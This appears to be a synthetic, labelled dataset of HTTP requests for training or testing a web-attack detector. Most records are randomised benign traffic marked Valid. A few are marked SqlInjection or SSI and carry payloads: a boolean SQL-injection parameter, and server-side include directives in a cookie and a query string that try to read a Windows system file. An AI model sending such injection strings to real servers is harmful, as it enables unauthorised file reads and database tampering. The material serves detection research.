Authorization: NTLM ZmhyU3R6T3RyZzZpcGxodFRtMWVoaGJndHBvc29vY2d1aWEwaDc=
Range: 89712-
Referer: /rnhbUrVd/Oltraqt0/xmTlPAa4/ph5xhrla/ttl0dssy.msf
TE: deflate,trailers,trailers
Trailer: If-Unmodified-Since
User-Agent: sgehl (nTxeALT03; jXGIl6pYB; sYaVeSx; h9BqMn; alnisa)
UA-CPU: 68000
UA-Disp: 644,8528,16
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 453x832
Via: FTP/9.8 49.243.96.220
Transfer-Encoding: compress
Upgrade: eds/9.2, isa/3.3, kej/9.4
Warning: 929 111.138.94.34 "fYos2dhjediq09q9ela" "Sun, 20 Sep 09 07:36:42 GMT"
X-Forwarded-For: 80.188.232.109
X-Serial-Number: 2857393
----: ------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 29973
Start - Id: 26438
class: Valid
GET /_iNuep3gfgG1/mi/eMBkjARela0RFq5uJmH/hiM/et.asmx?tbfqaewnoIyode=braoD&ah1nn=sad&eiion6U7=ee%40 HTTP/1.1
Host: www.behLt.fr
Connection: itus2an
Accept: */*;q=0.0
Accept-Charset: *;q=0.9
Accept-Encoding: compress;q=0.7, compress;q=0.0
Accept-Language: *;q=0.1
Cache-Control: no-transform
Client-ip: 242.111.58.119
Cookie: sr=winntgflikeNe ce+efxs;RcEwget@-F=tod
Cookie2: $Version="98"
Date: Fri, 26 Nov 04 12:55:18 UTC
ETag: W/"mXMrR@AEjz0b-V7ZPFS"
Expect: hrsM
From: 0vaorneD@ken7hhpNbe.st
If-Modified-Since: Sat, 13 May 06 13:07:07 GMT
If-Unmodified-Since: Tue, 13 Apr 04 21:14:19 UTC
If-Match: *
If-None-Match: "VKJrudD33zJE47v8XSU"
If-Range: Wed, 20 Jul 05 22:01:17 CET
Max-Forwards: 7629
MIME-Version: 7.7
Pragma: ce4Dztze='twdom'
Proxy-Authorization: Digest username="tmff8btS"
Authorization: NTLM YWkxdnVmMWRzeThudHJhMGVsbmp1c290bHR4ZGNzb3BsaXRpY3JzUjMzZGc2MA==
Range: 976674-,-469,33-19
Referer: /vscdt/aoa9fd/rx5rc4c/aedo.dll
TE: trailers
Trailer: Connection
User-Agent: tcdmtpsNs
UA-CPU: StrongARM
UA-Disp: 719,2731,16
UA-OS: Win98
UA-Color: color16
UA-Pixels: 0638x9966
Via: 7.9 www.431nTa.tiff
Transfer-Encoding: identity
Upgrade: dagd9/9.3, uHn/5.3
Warning: 450 188.228.247.40 "Prlzujn9alznt" "Tue, 29 May 07 14:12:11 CET"
X-Forwarded-For: 34.156.94.22
X-Serial-Number: 101021310
----: ------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 26438
Start - Id: 7039
class: Valid
POST /M_/08tihr/ijowvncetlntanyshm/tein/kNy.sh? HTTP/1.1
Content-Length: 156
Content-Language: daDi
Content-Encoding: deflate
Content-Location: http://www.L2ijoegc.fr/ytys/iqowTi/yl1hhT8/Ereoias.txt
Content-MD5: VDVua2F0bmFzdGFmY3Nscw==
Content-Type: application/x-www-form-urlencoded
Expires: Thu, 18 Jun 09 22:22:42 GMT
Last-Modified: Mon, 19 Jul 04 02:18:35 CET
Host: www.nwkt.org:80
Connection: close
Accept: */*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: hy-gLl6ein1, marz9rri-iitTq, bwce6-tfddas1l, ddidAima-hnhtl
Cache-Control: max-age=534
Client-ip: 42.139.126.253
Cookie: pgn21bs1si=o7kNZfQKa
Cookie2: $Version="137"
Date: Mon, 07 Jan 08 21:50:15 CET
ETag: "5mD4pIqzxc3lOyc"
Expect: 100-continue
From: yfats@jmaNa.biz
If-Modified-Since: Mon, 03 Oct 05 12:34:24 GMT
If-Unmodified-Since: Sat, 19 Aug 06 15:31:58 GMT
If-Match: "bhy8OeWZjPcKb6KWgo"
If-None-Match: *
If-Range: Wed, 17 Jan 07 05:53:38 CET
Max-Forwards: 031
MIME-Version: 6.3
Pragma: sc='spnaAt0'
Proxy-Authorization: Basic RWlubnVhOmN0eDVs
Authorization: Basic ZGhFd2hkOnVxc3N0
Range: -251792
Referer: /cee0Ex/xtse/eomM/5ydrgw.asmx
TE: chunked;q=0.5,trailers
Trailer: Accept-Charset
User-Agent: Mozilla/7.0 (compatible; MSIE 9.5; Open BSD i386; aUead; do4uaot)
UA-CPU: x86
UA-Disp: 1480,4443,32
UA-OS: Win9x
UA-Color: color8
UA-Pixels: 8498x1908
Via: 3.9 www.raugr.png, FTP/0.2 226.122.10.93, 3.8 164.8.123.137
Transfer-Encoding: compress
Upgrade: natsnn/3.2, frn/5.3, ftOtpa/1.1
Warning: 539 www.kasz3t2.jpg "c8saEyAaoa" 
X-Forwarded-For: 213.145.136.133
X-Serial-Number: 484018235309
----: ----------------
~~~~~: ~~~~~~~~~~

het4u=8607931&gQnwpms=a btg&lunmtsecon1nn=oegttb+hg&2p9wInoSbi=eqn&sRhg=181&gEdA03=2&sy=123&rrdfianun=608198&c9jsuu7sVuCneic=1445&xagm=utmlqcosaey-hi 9nrh

End - Id: 7039
Start - Id: 42576
class: SqlInjection
GET /5tt/t1gV7A@4y9iVoQc/dR5ex/tksLxLjM39J@0K/7enetcat.qUj/d6ZkbtNzz/rerfnpmiaihsagHrxR/0@h/lE/yesgaOneK2d1ei/nNp.rEb/1nizRteah9epdoa.nsf?ehnfGortblhim0=53651&0f6anizas=vsArCDzPjjs&ssyt=0716++++or+++id%3E9++or+++ls_id%3C2650&cxYD8dVV=28&ea9l=Nrtnere HTTP/1.1
Host: 231.109.30.81:48669
Connection: A6jeo9
Accept: audio/*;q=0.1
Accept-Charset: windows-1250;q=0.7, ks_c_5601-1987, euc-jp;q=0.0, windows-1258;q=0.7
Accept-Encoding: *
Accept-Language: IexDEdn-7cdsthx;q=0.7
Cache-Control: min-fresh=59
Client-ip: 8.53.51.76
Cookie: mEd=42;olhjtaZrNheifce= s+h3ntmpetebetweenTwt=;nwoesIAeyndieti=taw3 ur;W5eF7ZkWYO=3;nsi=1bi]R lh
Cookie2: $Version="6"
Date: Mon, 07 Jun 04 12:10:05 UTC
ETag: "AIbTkMC-@CHeNXLDldey"
Expect: wshtlUla
From: tmTstilr@oerx.it
If-Modified-Since: Mon, 01 Jan 07 20:59:12 UTC
If-Unmodified-Since: Sun, 01 Jan 06 24:54:21 GMT
If-Match: "Bj0wV@kwatKawSkqVcj-"
If-None-Match: *
If-Range: Sat, 12 Sep 09 18:10:38 UTC
Max-Forwards: 1982
MIME-Version: 2.8
Pragma: no-cache
Proxy-Authorization: Basic Nm9UYWV3c3I6bmUzYQ==
Authorization: Basic SGRva2VoOmw4bzNqaQ==
Range: -327,463619-533,09-501926
Referer: /sTned/tnwvavot/exocnu2y.php
TE: chunked,trailers,gzip;q=0.6
Trailer: From
User-Agent: Mozilla/5.6 (compatible; Konqueror/6.7; Unix; sisetwnain; ogrAibvn; aiud)
UA-CPU: MIPS
UA-Disp: 8242,0192,32
UA-OS: Win95
UA-Color: color32
UA-Pixels: 161x8196
Via: aae/3.5 64.16.68.150, 1.8 www.bimenoc.js, 2.8 www.cyted.shtml:8338
Transfer-Encoding: Asgn
Upgrade: lxiev/4.8, Sc4/5.2, owd/0.5
Warning: 740 www.flc6.js "aobefTi4oh6lxaa" "Sat, 01 Jul 06 04:47:36 CET"
X-Forwarded-For: 149.227.177.29
X-Serial-Number: 81684
----: -----------------------------------
~~~~~: ~~~~~~~~~~~~~~~

null

End - Id: 42576
Start - Id: 12292
class: Valid
GET /hGSrIw-/dytnEMe25/s4s1Sd6WU/dBHaJzbU1njOmE4-9.shtml?in8n1se2=961&ur3=nsrNiTaRt&oHitemeoSido=x5ldP HTTP/1.0
Host: www.gl0eet.cz:9
Connection: keep-alive
Accept: video/*;q=0.6
Accept-Charset: iso-8859-9
Accept-Encoding: 
Accept-Language: cuttrho-onsd, t4Vscs-ie;q=0.7
Cache-Control: no-transform
Client-ip: 49.9.133.115
Cookie: acNneshttterlio=oRPyjhSgI
Cookie2: $Version="003"
Date: Sat, 06 Feb 10 24:34:03 UTC
ETag: "GwBN0nMB2QWnAOLX"
Expect: 100-continue
From: ata0ted@pthuw.ch
If-Modified-Since: Thu, 12 Oct 06 23:48:43 GMT
If-Unmodified-Since: Wed, 19 Dec 07 24:26:17 UTC
If-Match: *
If-None-Match: "xakNsK.RajElORr2q@t"
If-Range: "GcNcT4gv9eOzEq.4"
Max-Forwards: 0915
MIME-Version: 5.0
Pragma: Rl='ytfh1o'
Proxy-Authorization: Basic dG1yeWxhajY6YjVsMnVhdG8=
Authorization: NTLM Y2FhcW4xZXJhZXN0cmV0YTQxdGx0YWhhdG90ZXRpaGU=
Range: -017507,1688-3
Referer: /HmNerRt/sRwze/SeerT/ehtw/oriR.doc
TE: trailers,trailers,chunked
Trailer: Host
User-Agent: dsod2/5.9.5.7.6
UA-CPU: 68000
UA-Disp: 1340,7925,16
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 981x039
Via: 3.7 175.93.127.209, 7.8 241.144.157.135, 3.5 www.4iF2ere.png
Transfer-Encoding: identity
Upgrade: yohoh/1.0, aet/2.6, xthnat/0.6
Warning: 710 44.94.63.159 "Dh6webSt4" 
X-Forwarded-For: 108.211.80.19
X-Serial-Number: 787463
----: -----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 12292
Start - Id: 40387
class: SSI
GET /alieisgt/hy3bv9coaJOZdGRNQXCb/Ahkttd1z/96@nB-/GBZ/QGsL/5ELvS7/F@.php3?63etcs2VQRGZ=104933&wMseteIeo=td6%2Fdx%3Fg+&aunArnsefnteta=t17OMTwz.mBB HTTP/1.0
Host: www.iceTte.com
Connection: close
Accept: text/*;q=0.9
Accept-Charset: *;q=0.7
Accept-Encoding: 
Accept-Language: haena5t-E;q=0.3, o0w-o, nsas0nsf-t;q=0.6
Cache-Control: min-fresh=7767
Cookie: stb=<!--     #include virtual="d:\windows\autoexec.bat"   -->;I6NtqVn=6905
Cookie2: $Version="7"
Date: Thu, 11 Mar 04 10:40:57 CET
ETag: W/"jY-e5cxuJGhKSdW"
Expect: 100-continue
From: loaTs@utd7g.cz
If-Modified-Since: Tue, 30 May 06 20:00:28 CET
If-Unmodified-Since: Thu, 26 Jun 08 18:02:15 CET
If-Match: "DP9bmvKAUnza.R9"
If-None-Match: "RTjUnbpfbfrve3W"
If-Range: Mon, 06 Feb 06 22:02:10 GMT
Max-Forwards: 1194
Pragma: no-cache
Proxy-Authorization: Basic cmV1ZzpxZW50dA==
Authorization: 9meu Apsr4=ucss42tM
Referer: http://25wp1l.org/nYqYe/meVi8eA/uaoux.mpg
TE: deflate,chunked;q=0.3
Trailer: Proxy-Authorization
User-Agent: Mozilla/8.2 (Windows; U; Win98 7.0; ur-ac; rv:2.8.9) Gecko/38575954
Via: HTTP/3.4 97.122.29.168
Transfer-Encoding: identity
Upgrade: ytqi/4.6, eenn/3.4, hEy7h/5.6
Warning: 987 59.171.200.42 "hackaeidtruoeai03z" 
X-Forwarded-For: 118.118.53.192
----: -----------

null

End - Id: 40387
Start - Id: 22333
class: Valid
GET /ave7IkswhuiRoAi/9c/hiVZGRBeVfoFt@/c3Nu8Lwh/ePvWN.Emko/sC/oeHj1So/Errrvjonettimc.htm?zX8a=8459631587 HTTP/1.1
Host: 191.197.26.100:80
Connection: nicenr
Accept: */*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *;q=0.1
Cache-Control: ir='e'
Client-ip: 16.123.94.148
Cookie: NyM0m5-Nk=bt9elel5nspms;P4wVps3allI=teL9dslfireg;api35z_=1661;update_b3H=eShhnEIleCtenEsw
Cookie2: $Version="8"
Date: Mon, 01 Mar 10 03:35:59 GMT
ETag: W/"lHVx_e.CMm9IOvVHpR"
Expect: 100-continue
From: iHpsna2i@sBsaOrTep.ch
If-Modified-Since: Fri, 12 Mar 04 07:03:24 UTC
If-Unmodified-Since: Wed, 30 Jul 08 12:01:20 UTC
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 9
MIME-Version: 9.4
Pragma: no-cache
Proxy-Authorization: NTLM YTZoc25vd3RkM2lsbG9jc3c0QXNlY3NyaXFsdGVyaXVsc3R0b2V0aWI=
Authorization: Basic OW44dHI6b3JlaQ==
Range: -086874,-834
Referer: /lrj5h/assIezrd/oreEyss/sg7abu.mp3
TE: gzip;q=0.0
Trailer: Trailer
User-Agent: Mozilla/3.2 (Machintosh; U; PPC Mac OS X 0.0; yj-of; rv:3.6.6) Gecko/09596737
UA-CPU: StrongARM
UA-Disp: 6322,2576,16
UA-OS: Win95
UA-Color: color16
UA-Pixels: 254x8392
Via: auXnfx/3.0 213.148.48.217
Transfer-Encoding: deflate
Upgrade: ujhe/8.0, pws/9.8
Warning: 671 28.174.76.18 "cWdlqucSkne3oqeaa" "Tue, 12 Oct 04 20:29:33 CET"
X-Forwarded-For: 205.232.245.228
X-Serial-Number: 8809830
----: ----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 22333
Start - Id: 23482
class: Valid
GET /ewud8JOJq6cpj/wEm/input8VQegz5hTDY1Z7/eiyg@4Uj247K/aa9BddSdb@iDGr/oE8mslestspOlBtnlb/9AAty8ecifbu5tMdjsi.css?nIhnHq=lu%2BHor&hocohtmiP=s3KJ8X0R2A&oEniatTehnskith=e%7Ee%3D%3A7&2sCcV4G=9297&sN4l2nscstac=6093991&xjmte=lge&tndn=0fIePipIow&nhb=hrdperlnsdagd&unionAhu=0pD74%5Do90r&i6aa=t0c&N@UD=sssimerpy&pTrn8a5evh=iSmzAatpHj&yAzGiQkKYlF=tmpetf&eclhEtsTcerti=I&Tlsanufe5ehvhe=7 HTTP/1.1
Host: 186.252.34.169
Connection: aethelsn
Accept: */*;q=0.3
Accept-Charset: iso-8859-9;q=0.6, iso-8859-9;q=0.5
Accept-Encoding: *
Accept-Language: *;q=0.1
Cache-Control: no-store
Client-ip: 248.202.62.202
Cookie: BKCVp7R4K=767;TwbK=aanozhtacces0d;uheb4aodefeaEhn=ir:0dlocatione[Rdhau);6cY3esissfsa=nQXyO;Ysg=86941
Cookie2: $Version="651"
Date: Sun, 24 Jul 05 21:04:34 CET
ETag: W/".q@g3ZRYisszTis"
Expect: 100-continue
From: nsiialel@smwti.cz
If-Modified-Since: Fri, 02 Sep 05 21:34:29 UTC
If-Unmodified-Since: Sat, 21 Jan 06 15:45:03 GMT
If-Match: "9lm9ar5Vm7CC1hy"
If-None-Match: "qHF29ijynKdF.Uen"
If-Range: Wed, 24 Feb 10 11:45:47 CET
Max-Forwards: 3
MIME-Version: 2.0
Pragma: no-cache
Proxy-Authorization: NTLM YW5kc3V2dHJ0bmd3ZWFuYUxjcm9MTWVlZWVjc2FUenN2RVNm
Authorization: NTLM bk90bW9pZGx0dXducm9PdGlBZU5wbzZhMWNpc2RvdHRlYw==
Range: 43-,164-
Referer: http://eldAne.fr/isi6tdef/neaoeO/Rsbo.gif
TE: trailers,trailers,trailers
Trailer: Transfer-Encoding
User-Agent: Mozilla/3.5 (Machintosh; U; PPC 8.0; n2-do; rv:8.0.2) Gecko/29377058
UA-CPU: StrongARM
UA-Disp: 2035,3360,32
UA-OS: Solaris
UA-Color: color16
UA-Pixels: 7794x3946
Via: 9.2 49.81.210.186:7
Transfer-Encoding: identity
Upgrade: tieehc/5.0, aratsh/2.3
Warning: 162 www.onsae.html:24586 "ehtavthpd" "Fri, 12 Jan 07 10:10:18 GMT"
X-Forwarded-For: 146.71.117.9
X-Serial-Number: 22339968152502117473
----: ------------------------------------
~~~~~: ~~~~~~~~~~~~~~~

null

End - Id: 23482
Start - Id: 22710
class: Valid
GET /p1g/jINAarAC8/itpiopo/prE7s6Z2/1aeiteabcwy1/5TtelnetpA_location/eS8A1aSIPrdvl.mdb? HTTP/1.1
Host: 135.251.163.187
Connection: keep-alive
Accept: video/*;q=0.4, application/x-tar;q=0.3
Accept-Charset: iso-8859-5;q=0.4, x-mac-roman, windows-1257;q=0.8, windows-1251
Accept-Encoding: *;q=0.5
Accept-Language: yb-rb
Cache-Control: no-store
Client-ip: 24.173.40.220
Cookie: sovO=40133321;rRtoyss=m?;opaegrm=netaolog e6inAri;ZMxupdatejsz=sArdC
Cookie2: $Version="4"
Date: Thu, 13 Dec 07 10:56:52 CET
ETag: W/"XUHbUD3CedbGOUJ@"
Expect: ol5aaGn=airptp;AohYo5j=oroui8
From: itnsrE@1aewnr4e.biz
If-Modified-Since: Fri, 25 Sep 09 11:37:56 CET
If-Unmodified-Since: Mon, 01 Nov 04 02:52:08 UTC
If-Match: *
If-None-Match: "QjBonRq3H10Zb6U"
If-Range: "Y8DIyk223FWkigoH"
Max-Forwards: 8748
MIME-Version: 2.0
Pragma: jtA='iyLds4sa'
Proxy-Authorization: Digest algorithm=MD5-sess
Authorization: Basic cm54RWg6dW9zM2tu
Range: -0811
Referer: /estefme.asp
TE: trailers
Trailer: Max-Forwards
User-Agent: dlcO6a/6.2.1.4.6
UA-CPU: x86
UA-Disp: 949,175,16
UA-OS: Win98
UA-Color: color32
UA-Pixels: 0084x738
Via: 9.9 252.92.232.150, 3.9 4.156.178.99:70139
Transfer-Encoding: deflate
Upgrade: npstdo/2.1, Bagih/0.7, ysdS/4.0, iMl/4.5
Warning: 287 114.101.191.4 "analt2uUr8sles" 
X-Forwarded-For: 57.171.74.241
X-Serial-Number: 12701556330524195
----: ----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 22710
Start - Id: 18660
class: Valid
GET /p_0oYVuPslFw2i2UC/eo/Boaix/qc1/0w0Lmenognitios1I/iffrtld0Iteu.dll?lar4eoouPtechc=xriz7O&ananpHa=t7ed%3Djorrgt7asn%3Apsaha%29&r1ecmdEI=ithstrc&trk6=aoiir&aPK9lah-=Wiili&na4t=q&OetcNppdrop=ip22htjdf&dut4cnmea=%2F%3Fetnatnsdocumentta&rsyy0e=eNs%40oaqn&cMusrph=ln%25ndtennph-eh%3AsN8er&ohniee=iFTj_ziZgR&FWmochaUl=wrrt&tbyd=trEp HTTP/1.1
Host: www.5zhScitd6.net
Connection: keep-alive
Accept: audio/basic, audio/*, video/*;q=0.3
Accept-Charset: *
Accept-Encoding: *
Accept-Language: smrgd-i;q=0.2, T0ltoB-t, ho-aa;q=0.7, s2rdlihb-oeskx
Cache-Control: only-if-cached
Client-ip: 4.43.184.37
Cookie: yssmmwesedeG=iss$pb;xUipta=saqoo6aPNhRd;PhO8FitIr=|h4r-h;ma4rd5rR=n's]n;muhd=snPh8gS0HW;DvQFupdate2passwdcopyv.s=71776097
Cookie2: $Version="42"
Date: Fri, 19 Nov 04 07:19:51 GMT
ETag: "QkhFCH2dPB03KxuMj"
Expect: LZFetr=hcnoorta;eeerse
From: sue8eo@qtEnDQ2.de
If-Modified-Since: Sat, 11 Aug 07 24:52:48 UTC
If-Unmodified-Since: Sun, 11 Dec 05 15:39:04 CET
If-Match: "rxmuEZjGLh3t-a1MYN4T"
If-None-Match: "K4RyUmqgYsMW0UP"
If-Range: Wed, 26 May 04 13:51:59 GMT
Max-Forwards: 58
MIME-Version: 8.9
Pragma: no-cache
Proxy-Authorization: Digest opaque="msdld"
Authorization: Basic ZXI1ZWx0Z286bjVoaGF0OQ==
Range: -0
Referer: http://dinz.cz/ipEcir0/ir46o/taiatr/ceottte/tckees.gif
TE: trailers,trailers
Trailer: If-Modified-Since
User-Agent: Mozilla/2.6 (Windows; U; Windows NT 7.4; xt-tr; rv:7.0.5) Gecko/66749754
UA-CPU: StrongARM
UA-Disp: 7139,4412,32
UA-OS: Win98
UA-Color: color32
UA-Pixels: 542x850
Via: FTP/0.3 www.njeret.shtml, 9.1 www.todeOui.png, xt1/8.0 www.esrotgqn.jpeg:4700
Transfer-Encoding: gzip
Upgrade: eaBz/5.2, etexlo/6.3, eoD/7.3
Warning: 599 248.78.6.97 "deo0tiacbum" 
X-Forwarded-For: 157.146.253.229
X-Serial-Number: 6772472077190177266
----: -------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 18660
Start - Id: 13097
class: Valid
GET /goR3guaRcV1HW0l.CK/DEMcRASCX8S/X8NgUhp/BTyeh.4A/coegri60oot9adnttse/Ud1Tjeval-mecmbs9A/dh8itd/hQ/6qbxstdset/t76miozgejathAn/es/LCacceptHB.htm?re=17193&ei=ai7&kuogfm=0431&aeIi2tLfketese=e%7COt%40a%27ii4etofbmp+se&nrdeLytRsem=%29imo9&eossrvth0uV1=4&ozherndXoa=uC0S HTTP/1.1
Host: 13.176.119.222:8
Connection: keep-alive
Accept: application/rtf, audio/basic;q=0.4
Accept-Charset: *
Accept-Encoding: *;q=0.6
Accept-Language: *
Cache-Control: min-fresh=1941
Client-ip: 64.217.115.153
Cookie: e9mth=etinp;ZwBe2Q.metagu=2639671576;Z_iv=sapnE;2eja7srr=nf;dGd3oth=7179;eesw=\|wgi
Cookie2: $Version="38"
Date: Thu, 10 May 07 14:04:23 UTC
ETag: W/"0Me.C48IgEfuScMhLj"
Expect: vn0oRta6=bigseso;4zS2eu
From: lxksWme@metbhbeef.it
If-Modified-Since: Fri, 18 Sep 09 24:06:51 UTC
If-Unmodified-Since: Tue, 11 Oct 05 06:41:42 UTC
If-Match: *
If-None-Match: *
If-Range: Mon, 20 Aug 07 14:39:55 GMT
Max-Forwards: 235
MIME-Version: 1.2
Pragma: ln='t'
Proxy-Authorization: Digest response="04cA77a35eD11B63aeA1e7AFC096DEab"
Authorization: Digest cnonce="trOt6utf"
Range: 95-,62384-4288
Referer: /rertuors/eesea/2eoi.tiff
TE: chunked
Trailer: Accept-Encoding
User-Agent: Mozilla/7.0 (X11; U; Unix 3.8; ai-bd; rv:9.6.1) Gecko/45291848
UA-CPU: Sparc
UA-Disp: 160,1655,16
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 1747x3249
Via: HTTP/5.9 189.70.191.192:2328
Transfer-Encoding: gzip
Upgrade: ai1a/1.4
Warning: 669 112.73.215.188 "jta67bnsspeflree52nt" 
X-Forwarded-For: 129.45.112.20
X-Serial-Number: 8279453962485
----: ------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 13097
Start - Id: 40517
class: SSI
GET /eu1cXI/edUXNB.CSnv0iW/DoE2EaDp/iedT8t/au3oih6Ea/az0jtud5/eL/dn.png?rNve=lvBoimC&Sceooe3r=46528036&http7Lz0ltn_qp=709141&HeocetsciH4u=k.4hbinH1U&seLsz=6165605723&7n=shutdownrYe%3Ea+hterethrI%26&bhftSe=t_z&luQxp_Z@NC=90983&ce8oaal=%3C%21--++%23include+++++virtual%3D%22d%3A%5Cwindows%5Cautoexec.bat%22+--%3E&ecmani1=EkaiteIpedpIs2en&eadeeee2V=iamaccept&ii=uE72kM&feOs4jkbhjaasy=irdtlocation&lpvermteidacye=onamwt HTTP/1.1
Host: 123.142.34.34:80
Connection: keep-alive
Accept: text/xml, text/plain
Accept-Charset: shift_jis;q=0.3, koi8-r;q=0.2, x-mac-cyrillic
Accept-Encoding: 
Accept-Language: rm91ejse-el, 8ai-Rerf, c-kv;q=0.3, 8I-ldd;q=0.0
Cache-Control: no-transform
Client-ip: 230.154.132.193
Cookie: h0=1
Cookie2: $Version="480"
Date: Tue, 20 Dec 05 19:39:44 CET
ETag: W/"0HCHGnCBnWhjG4@"
Expect: easvet2=R7howlie
From: anl1@udeAd.net
If-Modified-Since: Thu, 08 Oct 09 04:00:32 UTC
If-Unmodified-Since: Sat, 04 Mar 06 13:19:01 UTC
If-Match: "pVqsDZeXGRcdjc."
If-None-Match: "EsETP1MTQ9lW0iEnw8"
If-Range: "cwd4ExOo_2EuUhW60"
Max-Forwards: 4269
MIME-Version: 8.6
Pragma: u=eyEbn
Proxy-Authorization: mmone heot=htan
Authorization: Basic aGhhMTplaHpo
Range: 9539-,9338-,-3373
Referer: http://www.tyyetcN.ch/aamose0o/imnncngs/vna6v0e/ZqEs.dll
TE: gzip,trailers,trailers
Trailer: If-Modified-Since
User-Agent: Mozilla/0.5 (compatible; Konqueror/6.8; SunOS sun4u; 0rhb; NeRtT2dkei)
UA-CPU: MIPS
UA-Disp: 591,998,16
UA-OS: Windows 98
UA-Color: color16
UA-Pixels: 278x2627
Via: 5.4 www.tlIyar6o.shtml, 6.6 189.132.41.73
Transfer-Encoding: compress
Upgrade: erf2/5.5, agh/2.9, dtoitg/7.9
Warning: 013 www.7sm6.png:35283 "lsedoeai3ucu" 
X-Forwarded-For: 252.212.230.66
X-Serial-Number: 4796093744
----: ---------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 40517
Start - Id: 9212
class: Valid
GET /jt/esaKGHHkFp/lrm2Llotgisne02hIor/JlTscriptmAKs5qxp_L4/oce7itafcvbacte/nKw.5i5vAZtsXJb/dc/a6eHQSo4/52lcn8avHySAPAnc/iACrWlv3Jm-a8m.mspx?oefBkearonlt=ht HTTP/1.0
Host: www.iadHn.net:42281
Connection: 4cLteifh
Accept: audio/*, application/*;q=0.1, image/png
Accept-Charset: windows-1258;q=0.3, shift_jis, windows-1254, x-mac-hebrew;q=0.0, iso-8859-8;q=0.5
Accept-Encoding: identity;q=0.7
Accept-Language: *
Cache-Control: no-transform
Client-ip: 25.52.6.133
Cookie: oewyenac=l770=nw
Cookie2: $Version="676"
Date: Sun, 08 Aug 04 14:24:02 GMT
ETag: "h.R@X@.Z5kExrCJ"
Expect: 100-continue
From: enjtcitc@et92Icoot.com
If-Modified-Since: Sun, 22 Apr 07 14:30:11 CET
If-Unmodified-Since: Sat, 16 May 09 22:42:17 CET
If-Match: "3z8HE3yLnd4zJ897d"
If-None-Match: *
If-Range: "yclKV_9IEHzUqpUdGp2"
Max-Forwards: 919
MIME-Version: 3.1
Pragma: no-cache
Proxy-Authorization: Basic Y2U2cWQ6aHNlMTBwOXI=
Authorization: Digest uri=/zuacrA/u3e0/ttetUcte/w5bhyte.bin
Range: 7-,506-547400,2408-38770
Referer: http://www.s7he.biz/zSswdeez/ntqsw9l1/fiewwArh/hs9oe.png
TE: deflate;q=0.4
Trailer: If-None-Match
User-Agent: Mozilla/7.3 (compatible; Konqueror/5.5; Linux i586; sxirH; oipa2tent)
UA-CPU: Sparc
UA-Disp: 5248,9403,8
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 282x709
Via: HTTP/2.7 www.ewaDsqbt.jpeg:07909
Transfer-Encoding: identity
Upgrade: g62e/6.8, t6dret/4.6, 0fdou/6.5
Warning: 386 22.153.125.167 "t5eh" "Thu, 23 Jun 05 10:04:46 GMT"
X-Forwarded-For: 118.223.215.97
X-Serial-Number: 6194472934474
----: ---------------
~~~~~: ~~~~~~~~~~~~~~~

null

End - Id: 9212
Start - Id: 27543
class: Valid
GET /Nolaedi/ZWl/qWk-rmWPGX/hrHkI5Swhere/cejhX_J1rCA3Z/cArsrds/Qkq_urnFi8vA/8irSd5np0Ib0/osM/sRDYno3Jc/0c.sh?ev=%40bhtwget&xEw7T.nO=2062688&t7tt769rc=%5B&q8e=jvoha07&t8sEt861sn=33&aqdnyneduqaahe4=9891183 HTTP/1.0
Host: www.oNar.gov
Connection: close
Accept: */*;q=0.1
Accept-Charset: iso-8859-2, x-mac-cyrillic;q=0.2, utf-8, iso-8859-15
Accept-Encoding: 
Accept-Language: *
Cache-Control: max-stale=21199
Client-ip: 252.13.177.85
Cookie: GxXVCK220admin.q=988448;Y5uW=:a|oeiorn7tr9;yeq8r0c=ottsam3;O2nhincludetelnet=8765496
Cookie2: $Version="703"
Date: Thu, 16 Sep 04 21:09:13 CET
ETag: W/"Ud4azIHp.o.ZdS8s"
Expect: 100-continue
From: ru4em6@gcCndrd.cz
If-Modified-Since: Wed, 16 Apr 08 02:27:40 GMT
If-Unmodified-Since: Mon, 11 Sep 06 08:26:57 GMT
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 2596
MIME-Version: 7.8
Pragma: taako4hr=ftaje
Proxy-Authorization: Digest qop=auth-int
Authorization: dhcn enEer7=Raunri1
Range: -57147,586891-,-6
Referer: /n9aeiMn/RertrVlo/rehma/ct4bhthO/ws5Ydoue.shtml
TE: trailers
Trailer: Max-Forwards
User-Agent: Mozilla/8.7 (X11; U; Solaris 4.3; jr-rt; rv:6.0.3) Gecko/58962188
UA-CPU: PowerPC
UA-Disp: 883,733,32
UA-OS: Linux
UA-Color: color8
UA-Pixels: 412x989
Via: HTTP/0.0 77.223.143.196
Transfer-Encoding: tjcora; wa6hn=Ces1fAc
Upgrade: p9oeKS/3.3, hrTbcn/5.9, it5rl/2.1
Warning: 807 www.tHT4nsBw.tiff "eatatio9t9Iq3" 
X-Forwarded-For: 224.28.160.220
X-Serial-Number: 03769
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 27543
Start - Id: 1533
class: Valid
